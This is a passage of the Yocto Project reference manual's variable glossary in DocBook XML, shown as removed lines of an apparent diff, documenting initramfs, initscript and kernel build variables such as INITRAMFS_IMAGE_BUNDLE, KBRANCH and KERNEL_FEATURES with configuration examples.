- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
- to
- <link linkend='var-INITRAMFS_FSTYPES'><filename>INITRAMFS_FSTYPES</filename></link>.
- </para>
-
- <para>
- An initramfs image provides a temporary root filesystem
- used for early system initialization (e.g. loading of
- modules needed to locate and mount the "real" root
- filesystem).
- <note>
- See the <filename>meta/recipes-core/images/core-image-minimal-initramfs.bb</filename>
- recipe in the
- <link linkend='source-directory'>Source Directory</link>
- for an example initramfs recipe.
- To select this sample recipe as the one built
- to provide the initramfs image,
- set <filename>INITRAMFS_IMAGE</filename> to
- "core-image-minimal-initramfs".
- </note>
- </para>
-
- <para>
- You can also find more information by referencing the
- <filename>meta-poky/conf/local.conf.sample.extended</filename>
- configuration file in the Source Directory,
- the
- <link linkend='ref-classes-image'><filename>image</filename></link>
- class, and the
- <link linkend='ref-classes-kernel'><filename>kernel</filename></link>
- class to see how to use the
- <filename>INITRAMFS_IMAGE</filename> variable.
- </para>
-
- <para>
- If <filename>INITRAMFS_IMAGE</filename> is empty, which is
- the default, then no initramfs image is built.
- </para>
-
- <para>
- For more information, you can also see the
- <link linkend='var-INITRAMFS_IMAGE_BUNDLE'><filename>INITRAMFS_IMAGE_BUNDLE</filename></link>
- variable, which allows the generated image to be bundled
- inside the kernel image.
- Additionally, for information on creating an initramfs
- image, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#building-an-initramfs-image'>Building an Initial RAM Filesystem (initramfs) Image</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INITRAMFS_IMAGE_BUNDLE'><glossterm>INITRAMFS_IMAGE_BUNDLE</glossterm>
- <info>
- INITRAMFS_IMAGE_BUNDLE[doc] = "Controls whether or not the image recipe specified by INITRAMFS_IMAGE is run through an extra pass (do_bundle_initramfs) during kernel compilation in order to build a single binary that contains both the kernel image and the initial RAM filesystem (initramfs)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Controls whether or not the image recipe specified by
- <link linkend='var-INITRAMFS_IMAGE'><filename>INITRAMFS_IMAGE</filename></link>
- is run through an extra pass
- (<link linkend='ref-tasks-bundle_initramfs'><filename>do_bundle_initramfs</filename></link>)
- during kernel compilation in order to build a single binary
- that contains both the kernel image and the initial RAM
- filesystem (initramfs) image.
- This makes use of the
- <link linkend='var-CONFIG_INITRAMFS_SOURCE'><filename>CONFIG_INITRAMFS_SOURCE</filename></link>
- kernel feature.
- <note>
- Using an extra compilation pass to bundle the initramfs
- avoids a circular dependency between the kernel recipe and
- the initramfs recipe should the initramfs include kernel
- modules.
- Should that be the case, the initramfs recipe depends on
- the kernel for the kernel modules, and the kernel depends
- on the initramfs recipe since the initramfs is bundled
- inside the kernel image.
- </note>
- </para>
-
- <para>
- The combined binary is deposited into the
- <filename>tmp/deploy</filename> directory, which is part
- of the
- <link linkend='build-directory'>Build Directory</link>.
- </para>
-
- <para>
- Setting the variable to "1" in a configuration file causes the
- OpenEmbedded build system to generate a kernel image with the
- initramfs specified in <filename>INITRAMFS_IMAGE</filename>
- bundled within:
- <literallayout class='monospaced'>
- INITRAMFS_IMAGE_BUNDLE = "1"
- </literallayout>
- By default, the
- <link linkend='ref-classes-kernel'><filename>kernel</filename></link>
- class sets this variable to a null string as follows:
- <literallayout class='monospaced'>
- INITRAMFS_IMAGE_BUNDLE ?= ""
- </literallayout>
- <note>
- You must set the
- <filename>INITRAMFS_IMAGE_BUNDLE</filename> variable in
- a configuration file.
- You cannot set the variable in a recipe file.
- </note>
- See the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-poky/conf/local.conf.sample.extended'><filename>local.conf.sample.extended</filename></ulink>
- file for additional information.
- Also, for information on creating an initramfs, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#building-an-initramfs-image'>Building an Initial RAM Filesystem (initramfs) Image</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INITRAMFS_LINK_NAME'><glossterm>INITRAMFS_LINK_NAME</glossterm>
- <info>
- INITRAMFS_LINK_NAME[doc] = "The link name of the initial RAM filesystem image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The link name of the initial RAM filesystem image.
- This variable is set in the
- <filename>meta/classes/kernel-artifact-names.bbclass</filename>
- file as follows:
- <literallayout class='monospaced'>
- INITRAMFS_LINK_NAME ?= "initramfs-${KERNEL_ARTIFACT_LINK_NAME}"
- </literallayout>
- The value of the <filename>KERNEL_ARTIFACT_LINK_NAME</filename>
- variable, which is set in the same file, has the following
- value:
- <literallayout class='monospaced'>
- KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
- </literallayout>
- </para>
-
- <para>
- See the
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
- variable for additional information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INITRAMFS_NAME'><glossterm>INITRAMFS_NAME</glossterm>
- <info>
- INITRAMFS_NAME[doc] = "The base name of the initial RAM filesystem image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The base name of the initial RAM filesystem image.
- This variable is set in the
- <filename>meta/classes/kernel-artifact-names.bbclass</filename>
- file as follows:
- <literallayout class='monospaced'>
- INITRAMFS_NAME ?= "initramfs-${KERNEL_ARTIFACT_NAME}"
- </literallayout>
- The value of the
- <link linkend='var-KERNEL_ARTIFACT_NAME'><filename>KERNEL_ARTIFACT_NAME</filename></link>
- variable, which is set in the same file, has the following
- value:
- <literallayout class='monospaced'>
- KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INITRD'><glossterm>INITRD</glossterm>
- <info>
- INITRD[doc] = "Indicates a list of filesystem images to concatenate and use as an initial RAM disk (initrd)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Indicates list of filesystem images to concatenate and use
- as an initial RAM disk (<filename>initrd</filename>).
- </para>
-
- <para>
- The <filename>INITRD</filename> variable is an optional
- variable used with the
- <link linkend='ref-classes-image-live'><filename>image-live</filename></link>
- class.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INITRD_IMAGE'><glossterm>INITRD_IMAGE</glossterm>
- <info>
- INITRD_IMAGE[doc] = "When building a "live" bootable image (i.e. when IMAGE_FSTYPES contains "live"), INITRD_IMAGE specifies the image recipe that should be built to provide the initial RAM disk image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When building a "live" bootable image (i.e. when
- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
- contains "live"), <filename>INITRD_IMAGE</filename>
- specifies the image recipe that should be built
- to provide the initial RAM disk image.
- The default value is "core-image-minimal-initramfs".
- </para>
-
- <para>
- See the
- <link linkend='ref-classes-image-live'><filename>image-live</filename></link>
- class for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INITSCRIPT_NAME'><glossterm>INITSCRIPT_NAME</glossterm>
- <info>
- INITSCRIPT_NAME[doc] = "The filename of the initialization script as installed to ${sysconfdir}/init.d."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The filename of the initialization script as installed to
- <filename>${sysconfdir}/init.d</filename>.
- </para>
-
- <para>
- This variable is used in recipes when using <filename>update-rc.d.bbclass</filename>.
- The variable is mandatory.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INITSCRIPT_PACKAGES'><glossterm>INITSCRIPT_PACKAGES</glossterm>
- <info>
- INITSCRIPT_PACKAGES[doc] = "A list of the packages that contain initscripts. This variable is used in recipes when using update-rc.d.bbclass. The variable is optional and defaults to the PN variable."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of the packages that contain initscripts.
- If multiple packages are specified, you need to append the package name
- to the other <filename>INITSCRIPT_*</filename> as an override.
- </para>
-
- <para>
- This variable is used in recipes when using <filename>update-rc.d.bbclass</filename>.
- The variable is optional and defaults to the
- <link linkend='var-PN'><filename>PN</filename></link> variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INITSCRIPT_PARAMS'><glossterm>INITSCRIPT_PARAMS</glossterm>
- <info>
- INITSCRIPT_PARAMS[doc] = "Specifies the options to pass to update-rc.d. The variable is mandatory and is used in recipes when using update-rc.d.bbclass."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the options to pass to <filename>update-rc.d</filename>.
- Here is an example:
- <literallayout class='monospaced'>
- INITSCRIPT_PARAMS = "start 99 5 2 . stop 20 0 1 6 ."
- </literallayout>
- </para>
-
- <para>
- In this example, the script has a runlevel of 99,
- starts the script in initlevels 2 and 5, and
- stops the script in levels 0, 1 and 6.
- </para>
-
- <para>
- The variable's default value is "defaults", which is
- set in the
- <link linkend='ref-classes-update-rc.d'><filename>update-rc.d</filename></link>
- class.
- </para>
-
- <para>
- The value in
- <filename>INITSCRIPT_PARAMS</filename> is passed through
- to the <filename>update-rc.d</filename> command.
- For more information on valid parameters, please see the
- <filename>update-rc.d</filename> manual page at
- <ulink url='http://www.tin.org/bin/man.cgi?section=8&amp;topic=update-rc.d'></ulink>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INSANE_SKIP'><glossterm>INSANE_SKIP</glossterm>
- <info>
- INSANE_SKIP[doc] = "Specifies the QA checks to skip for a specific package within a recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the QA checks to skip for a specific package
- within a recipe.
- For example, to skip the check for symbolic link
- <filename>.so</filename> files in the main package of a
- recipe, add the following to the recipe.
- The package name override must be used, which in this
- example is <filename>${PN}</filename>:
- <literallayout class='monospaced'>
- INSANE_SKIP_${PN} += "dev-so"
- </literallayout>
- </para>
-
- <para>
- See the "<link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>"
- section for a list of the valid QA checks you can
- specify using this variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INSTALL_TIMEZONE_FILE'><glossterm>INSTALL_TIMEZONE_FILE</glossterm>
- <info>
- INSTALL_TIMEZONE_FILE[doc] = "Enables installation of the /etc/timezone file."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- By default, the <filename>tzdata</filename> recipe packages
- an <filename>/etc/timezone</filename> file.
- Set the <filename>INSTALL_TIMEZONE_FILE</filename>
- variable to "0" at the configuration level to disable this
- behavior.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IPK_FEED_URIS'><glossterm>IPK_FEED_URIS</glossterm>
- <info>
- IPK_FEED_URIS[doc] = "List of ipkg feed records to put into generated image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When the IPK backend is in use and package management
- is enabled on the target, you can use this variable to
- set up <filename>opkg</filename> in the target image
- to point to package feeds on a nominated server.
- Once the feed is established, you can perform
- installations or upgrades using the package manager
- at runtime.
- </para>
- </glossdef>
- </glossentry>
-
-<!--
- <glossentry id='var-INTERCEPT_DIR'><glossterm>INTERCEPT_DIR</glossterm>
- <glossdef>
- <para>
- An environment variable that defines the directory where
- post installation hooks are installed for the
- post install environment.
- This variable is fixed as follows:
- <literallayout class='monospaced'>
- ${WORKDIR}/intercept_scripts
- </literallayout>
- </para>
-
- <para>
- After installation of a target's root filesystem,
- post installation scripts, which are essentially bash scripts,
- are all executed just a single time.
- Limiting execution of these scripts minimizes installation
- time that would be lengthened due to certain packages
- triggering redundant operations.
- For example, consider the installation of font packages
- as a common example.
- Without limiting the execution of post installation scripts,
- all font directories would be rescanned to create the
- cache after each individual font package was installed.
- </para>
-
- <para>
- Do not edit the <filename>INTERCEPT_DIR</filename>
- variable.
- </para>
- </glossdef>
- </glossentry>
--->
-
- </glossdiv>
-
-<!-- <glossdiv id='var-glossary-j'><title>J</title>-->
-<!-- </glossdiv>-->
-
- <glossdiv id='var-glossary-k'><title>K</title>
-
- <glossentry id='var-KARCH'><glossterm>KARCH</glossterm>
- <info>
- KARCH[doc] = "Defines the kernel architecture used when assembling the configuration. You define the KARCH variable in the BSP Descriptions."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines the kernel architecture used when assembling
- the configuration.
- Architectures supported for this release are:
- <literallayout class='monospaced'>
- powerpc
- i386
- x86_64
- arm
- qemu
- mips
- </literallayout>
- </para>
-
- <para>
- You define the <filename>KARCH</filename> variable in the
- <ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#bsp-descriptions'>BSP Descriptions</ulink>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KBRANCH'><glossterm>KBRANCH</glossterm>
- <info>
- KBRANCH[doc] = "A regular expression used by the build process to explicitly identify the kernel branch that is validated, patched, and configured during a build."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A regular expression used by the build process to explicitly
- identify the kernel branch that is validated, patched,
- and configured during a build.
- You must set this variable to ensure the exact kernel
- branch you want is being used by the build process.
- </para>
-
- <para>
- Values for this variable are set in the kernel's recipe
- file and the kernel's append file.
- For example, if you are using the
- <filename>linux-yocto_4.12</filename> kernel, the kernel
- recipe file is the
- <filename>meta/recipes-kernel/linux/linux-yocto_4.12.bb</filename>
- file.
- <filename>KBRANCH</filename> is set as follows in that
- kernel recipe file:
- <literallayout class='monospaced'>
- KBRANCH ?= "standard/base"
- </literallayout>
- </para>
-
- <para>
- This variable is also used from the kernel's append file
- to identify the kernel branch specific to a particular
- machine or target hardware.
- Continuing with the previous kernel example, the kernel's
- append file (i.e.
- <filename>linux-yocto_4.12.bbappend</filename>) is located
- in the BSP layer for a given machine.
- For example, the append file for the Beaglebone,
- EdgeRouter, and generic versions of both 32 and 64-bit IA
- machines (<filename>meta-yocto-bsp</filename>) is named
- <filename>meta-yocto-bsp/recipes-kernel/linux/linux-yocto_4.12.bbappend</filename>.
- Here are the related statements from that append file:
- <literallayout class='monospaced'>
- KBRANCH_genericx86 = "standard/base"
- KBRANCH_genericx86-64 = "standard/base"
- KBRANCH_edgerouter = "standard/edgerouter"
- KBRANCH_beaglebone = "standard/beaglebone"
- </literallayout>
- The <filename>KBRANCH</filename> statements identify
- the kernel branch to use when building for each
- supported BSP.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KBUILD_DEFCONFIG'><glossterm>KBUILD_DEFCONFIG</glossterm>
- <info>
- KBUILD_DEFCONFIG[doc] = "Specifies an "in-tree" kernel configuration file for use during a kernel build."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When used with the
- <link linkend='ref-classes-kernel-yocto'><filename>kernel-yocto</filename></link>
- class, specifies an "in-tree" kernel configuration file
- for use during a kernel build.
- </para>
-
- <para>
- Typically, when using a <filename>defconfig</filename> to
- configure a kernel during a build, you place the
- file in your layer in the same manner as you would
- place patch files and configuration fragment files (i.e.
- "out-of-tree").
- However, if you want to use a <filename>defconfig</filename>
- file that is part of the kernel tree (i.e. "in-tree"),
- you can use the
- <filename>KBUILD_DEFCONFIG</filename> variable and append
- the
- <link linkend='var-KMACHINE'><filename>KMACHINE</filename></link>
- variable to point to the <filename>defconfig</filename>
- file.
- </para>
-
- <para>
- To use the variable, set it in the append file for your
- kernel recipe using the following form:
- <literallayout class='monospaced'>
- KBUILD_DEFCONFIG_<replaceable>KMACHINE</replaceable> ?= <replaceable>defconfig_file</replaceable>
- </literallayout>
- Here is an example from a "raspberrypi2"
- <filename>KMACHINE</filename> build that uses a
- <filename>defconfig</filename> file named
- "bcm2709_defconfig":
- <literallayout class='monospaced'>
- KBUILD_DEFCONFIG_raspberrypi2 = "bcm2709_defconfig"
- </literallayout>
- As an alternative, you can use the following within your
- append file:
- <literallayout class='monospaced'>
- KBUILD_DEFCONFIG_pn-linux-yocto ?= <replaceable>defconfig_file</replaceable>
- </literallayout>
- For more information on how to use the
- <filename>KBUILD_DEFCONFIG</filename> variable, see the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#using-an-in-tree-defconfig-file'>Using an "In-Tree" <filename>defconfig</filename> File</ulink>"
- section in the Yocto Project Linux Kernel Development
- Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_ALT_IMAGETYPE'><glossterm>KERNEL_ALT_IMAGETYPE</glossterm>
- <info>
- KERNEL_ALT_IMAGETYPE[doc] = "Specifies an alternate kernel image type for creation."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies an alternate kernel image type for creation in
- addition to the kernel image type specified using the
- <link linkend='var-KERNEL_IMAGETYPE'><filename>KERNEL_IMAGETYPE</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_ARTIFACT_NAME'><glossterm>KERNEL_ARTIFACT_NAME</glossterm>
- <info>
- KERNEL_ARTIFACT_NAME[doc] = "Specifies the name of all of the build artifacts."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the name of all of the build artifacts.
- You can change the name of the artifacts by changing the
- <filename>KERNEL_ARTIFACT_NAME</filename> variable.
- </para>
-
- <para>
- The value of <filename>KERNEL_ARTIFACT_NAME</filename>,
- which is set in the
- <filename> meta/classes/kernel-artifact-names.bbclass</filename>
- file, has the following default value:
- <literallayout class='monospaced'>
- KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
- </literallayout>
- </para>
-
- <para>
- See the
- <link linkend='var-PKGE'><filename>PKGE</filename></link>,
- <link linkend='var-PKGV'><filename>PKGV</filename></link>,
- <link linkend='var-PKGR'><filename>PKGR</filename></link>,
- and
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
- variables for additional information.
- <note>
- The <filename>IMAGE_VERSION_SUFFIX</filename> variable
- is set to
- <link linkend='var-DATETIME'><filename>DATETIME</filename></link>.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_CLASSES'><glossterm>KERNEL_CLASSES</glossterm>
- <info>
- KERNEL_CLASSES[doc] = "A list of classes defining kernel image types that kernel class should inherit."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of classes defining kernel image types that the
- <link linkend='ref-classes-kernel'><filename>kernel</filename></link>
- class should inherit.
- You typically append this variable to enable extended image
- types.
- An example is the "kernel-fitimage", which enables
- fitImage support and resides in
- <filename>meta/classes/kernel-fitimage.bbclass</filename>.
- You can register custom kernel image types with the
- <filename>kernel</filename> class using this variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_DEVICETREE'><glossterm>KERNEL_DEVICETREE</glossterm>
- <info>
- KERNEL_DEVICETREE[doc] = "Specifies the name of the generated Linux kernel device tree (i.e. the .dtb) file."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the name of the generated Linux kernel device tree
- (i.e. the <filename>.dtb</filename>) file.
- <note>
- Legacy support exists for specifying the full path
- to the device tree.
- However, providing just the <filename>.dtb</filename>
- file is preferred.
- </note>
- In order to use this variable, the
- <link linkend='ref-classes-kernel-devicetree'><filename>kernel-devicetree</filename></link>
- class must be inherited.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_DTB_LINK_NAME'><glossterm>KERNEL_DTB_LINK_NAME</glossterm>
- <info>
- KERNEL_DTB_LINK_NAME[doc] = "The link name of the kernel device tree binary (DTB)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The link name of the kernel device tree binary (DTB).
- This variable is set in the
- <filename>meta/classes/kernel-artifact-names.bbclass</filename>
- file as follows:
- <literallayout class='monospaced'>
- KERNEL_DTB_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
- </literallayout>
- The value of the <filename>KERNEL_ARTIFACT_LINK_NAME</filename>
- variable, which is set in the same file, has the following
- value:
- <literallayout class='monospaced'>
- KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
- </literallayout>
- </para>
-
- <para>
- See the
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
- variable for additional information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_DTB_NAME'><glossterm>KERNEL_DTB_NAME</glossterm>
- <info>
- KERNEL_DTB_NAME[doc] = "The base name of the kernel device tree binary (DTB)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The base name of the kernel device tree binary (DTB).
- This variable is set in the
- <filename>meta/classes/kernel-artifact-names.bbclass</filename>
- file as follows:
- <literallayout class='monospaced'>
- KERNEL_DTB_NAME ?= "${KERNEL_ARTIFACT_NAME}"
- </literallayout>
- The value of the
- <link linkend='var-KERNEL_ARTIFACT_NAME'><filename>KERNEL_ARTIFACT_NAME</filename></link>
- variable, which is set in the same file, has the following
- value:
- <literallayout class='monospaced'>
- KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_EXTRA_ARGS'><glossterm>KERNEL_EXTRA_ARGS</glossterm>
- <info>
- KERNEL_EXTRA_ARGS[doc] = "Specifies additional make command-line arguments the OpenEmbedded build system passes on when compiling the kernel."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies additional <filename>make</filename>
- command-line arguments the OpenEmbedded build system
- passes on when compiling the kernel.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_FEATURES'><glossterm>KERNEL_FEATURES</glossterm>
- <info>
- KERNEL_FEATURES[doc] = "Includes additional kernel metadata. The metadata you add through this variable includes config fragments and features descriptions."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Includes additional kernel metadata.
- In the OpenEmbedded build system, the default Board Support
- Packages (BSPs)
- <link linkend='metadata'>Metadata</link>
- is provided through
- the <link linkend='var-KMACHINE'><filename>KMACHINE</filename></link>
- and
- <link linkend='var-KBRANCH'><filename>KBRANCH</filename></link>
- variables.
- You can use the <filename>KERNEL_FEATURES</filename>
- variable from within the kernel recipe or kernel append
- file to further add metadata for all BSPs or specific
- BSPs.
- </para>
-
- <para>
- The metadata you add through this variable includes config
- fragments and features descriptions,
- which usually includes patches as well as config fragments.
- You typically override the
- <filename>KERNEL_FEATURES</filename> variable for a
- specific machine.
- In this way, you can provide validated, but optional,
- sets of kernel configurations and features.
- </para>
-
- <para>
- For example, the following example from the
- <filename>linux-yocto-rt_4.12</filename> kernel recipe
- adds "netfilter" and "taskstats" features to all BSPs
- as well as "virtio" configurations to all QEMU machines.
- The last two statements add specific configurations to
- targeted machine types:
- <literallayout class='monospaced'>
- KERNEL_EXTRA_FEATURES ?= "features/netfilter/netfilter.scc features/taskstats/taskstats.scc"
- KERNEL_FEATURES_append = " ${KERNEL_EXTRA_FEATURES}"
- KERNEL_FEATURES_append_qemuall = " cfg/virtio.scc"
- KERNEL_FEATURES_append_qemux86 = " cfg/sound.scc cfg/paravirt_kvm.scc"
- KERNEL_FEATURES_append_qemux86-64 = " cfg/sound.scc" </literallayout></para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_FIT_LINK_NAME'><glossterm>KERNEL_FIT_LINK_NAME</glossterm>
- <info>
- KERNEL_FIT_LINK_NAME[doc] = "The link name of the kernel flattened image tree (FIT) image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The link name of the kernel flattened image tree (FIT) image.
- This variable is set in the
- <filename>meta/classes/kernel-artifact-names.bbclass</filename>
- file as follows:
- <literallayout class='monospaced'>
- KERNEL_FIT_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
- </literallayout>
- The value of the <filename>KERNEL_ARTIFACT_LINK_NAME</filename>
- variable, which is set in the same file, has the following
- value:
- <literallayout class='monospaced'>
- KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
- </literallayout>
- </para>
-
- <para>
- See the
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
- variable for additional information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_FIT_NAME'><glossterm>KERNEL_FIT_NAME</glossterm>
- <info>
- KERNEL_FIT_NAME[doc] = "The base name of the kernel flattened image tree (FIT) image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The base name of the kernel flattened image tree (FIT) image.
- This variable is set in the
- <filename>meta/classes/kernel-artifact-names.bbclass</filename>
- file as follows:
- <literallayout class='monospaced'>
- KERNEL_FIT_NAME ?= "${KERNEL_ARTIFACT_NAME}"
- </literallayout>
- The value of the
- <link linkend='var-KERNEL_ARTIFACT_NAME'><filename>KERNEL_ARTIFACT_NAME</filename></link>
- variable, which is set in the same file, has the following
- value:
- <literallayout class='monospaced'>
- KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_IMAGE_LINK_NAME'><glossterm>KERNEL_IMAGE_LINK_NAME</glossterm>
- <info>
- KERNEL_IMAGE_LINK_NAME[doc] = "The link name for the kernel image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The link name for the kernel image.
- This variable is set in the
- <filename>meta/classes/kernel-artifact-names.bbclass</filename>
- file as follows:
- <literallayout class='monospaced'>
- KERNEL_IMAGE_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
- </literallayout>
- The value of the <filename>KERNEL_ARTIFACT_LINK_NAME</filename>
- variable, which is set in the same file, has the following
- value:
- <literallayout class='monospaced'>
- KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
- </literallayout>
- </para>
-
- <para>
- See the
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
- variable for additional information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_IMAGE_MAXSIZE'><glossterm>KERNEL_IMAGE_MAXSIZE</glossterm>
- <info>
- KERNEL_IMAGE_MAXSIZE[doc] = "The maximum allowable size in kilobytes of the kernel image file."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the maximum size of the kernel image file in
- kilobytes.
- If <filename>KERNEL_IMAGE_MAXSIZE</filename> is set,
- the size of the kernel image file is checked against
- the set value during the
- <link linkend='ref-tasks-sizecheck'><filename>do_sizecheck</filename></link>
- task.
- The task fails if the kernel image file is larger than
- the setting.
- </para>
-
- <para>
- <filename>KERNEL_IMAGE_MAXSIZE</filename> is useful for
- target devices that have a limited amount of space in
- which the kernel image must be stored.
- </para>
-
- <para>
- By default, this variable is not set, which means the
- size of the kernel image is not checked.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_IMAGE_NAME'><glossterm>KERNEL_IMAGE_NAME</glossterm>
- <info>
- KERNEL_IMAGE_NAME[doc] = "The base name of the kernel image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The base name of the kernel image.
- This variable is set in the
- <filename>meta/classes/kernel-artifact-names.bbclass</filename>
- file as follows:
- <literallayout class='monospaced'>
- KERNEL_IMAGE_NAME ?= "${KERNEL_ARTIFACT_NAME}"
- </literallayout>
- The value of the
- <link linkend='var-KERNEL_ARTIFACT_NAME'><filename>KERNEL_ARTIFACT_NAME</filename></link>
- variable, which is set in the same file, has the following
- value:
- <literallayout class='monospaced'>
- KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_IMAGETYPE'><glossterm>KERNEL_IMAGETYPE</glossterm>
- <info>
- KERNEL_IMAGETYPE[doc] = "The type of kernel to build for a device, usually set by the machine configuration files and defaults to 'zImage'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The type of kernel to build for a device, usually set by the
- machine configuration files and defaults to "zImage".
- This variable is used
- when building the kernel and is passed to <filename>make</filename> as the target to
- build.
- </para>
-
- <para>
- If you want to build an alternate kernel image type, use the
- <link linkend='var-KERNEL_ALT_IMAGETYPE'><filename>KERNEL_ALT_IMAGETYPE</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_MODULE_AUTOLOAD'><glossterm>KERNEL_MODULE_AUTOLOAD</glossterm>
- <info>
- KERNEL_MODULE_AUTOLOAD[doc] = "Lists kernel modules that need to be auto-loaded during boot"
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists kernel modules that need to be auto-loaded during
- boot.
- <note>
- This variable replaces the deprecated
- <link linkend='var-module_autoload'><filename>module_autoload</filename></link>
- variable.
- </note>
- </para>
-
- <para>
- You can use the <filename>KERNEL_MODULE_AUTOLOAD</filename>
- variable anywhere that it can be
- recognized by the kernel recipe or by an out-of-tree kernel
- module recipe (e.g. a machine configuration file, a
- distribution configuration file, an append file for the
- recipe, or the recipe itself).
- </para>
-
- <para>
- Specify it as follows:
- <literallayout class='monospaced'>
- KERNEL_MODULE_AUTOLOAD += "<replaceable>module_name1</replaceable> <replaceable>module_name2</replaceable> <replaceable>module_name3</replaceable>"
- </literallayout>
- </para>
-
- <para>
- Including <filename>KERNEL_MODULE_AUTOLOAD</filename> causes
- the OpenEmbedded build system to populate the
- <filename>/etc/modules-load.d/modname.conf</filename>
- file with the list of modules to be auto-loaded on boot.
- The modules appear one-per-line in the file.
- Here is an example of the most common use case:
- <literallayout class='monospaced'>
- KERNEL_MODULE_AUTOLOAD += "<replaceable>module_name</replaceable>"
- </literallayout>
- </para>
-
- <para>
- For information on how to populate the
- <filename>modname.conf</filename> file with
- <filename>modprobe.d</filename> syntax lines, see the
- <link linkend='var-KERNEL_MODULE_PROBECONF'><filename>KERNEL_MODULE_PROBECONF</filename></link>
- variable.
- </para>
